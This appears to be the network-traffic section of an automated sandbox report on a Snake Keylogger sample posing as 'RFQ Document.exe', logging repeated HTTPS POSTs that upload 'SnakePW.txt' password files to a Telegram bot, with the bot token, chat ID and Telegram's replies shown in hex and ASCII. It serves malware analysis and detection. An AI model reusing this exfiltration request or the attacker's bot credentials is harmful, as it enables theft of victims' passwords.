2021-09-28 05:59:29 UTC	338	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 36 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12797,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808769,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
213	192.168.2.4	50034	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:29 UTC	338	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255eac493ff Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:29 UTC	338	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 61 63 34 39 33 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255eac493ffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:29 UTC	339	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:29 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:29 UTC	339	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 36 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12799,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808769,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
214	192.168.2.4	50035	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:29 UTC	340	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255eae12f37 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:29 UTC	340	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 61 65 31 32 66 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255eae12f37Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:29 UTC	340	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:29 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:29 UTC	341	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 36 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12800,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808769,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
215	192.168.2.4	50036	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:29 UTC	341	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255eaf905e4 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:29 UTC	342	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 61 66 39 30 35 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255eaf905e4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:29 UTC	342	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:29 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:29 UTC	342	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 36 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12801,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808769,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
216	192.168.2.4	50037	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:29 UTC	343	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255eb180345 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:29 UTC	343	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 62 31 38 30 33 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255eb180345Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:29 UTC	344	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:29 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:29 UTC	344	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 36 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12802,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808769,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
217	192.168.2.4	50038	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:30 UTC	344	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255eb2d79f5 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:30 UTC	345	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 62 32 64 37 39 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255eb2d79f5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:30 UTC	345	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:30 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:30 UTC	346	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12803,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808770,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
218	192.168.2.4	50039	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:32 UTC	346	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255eb4c7845 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:32 UTC	346	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 62 34 63 37 38 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255eb4c7845Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:32 UTC	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:32 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:32 UTC	347	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12804,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808772,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
219	192.168.2.4	50040	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:32 UTC	348	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ec9ca33d Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:32 UTC	348	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 63 39 63 61 33 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ec9ca33dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:32 UTC	348	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:32 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:32 UTC	349	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12805,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808772,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49796	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
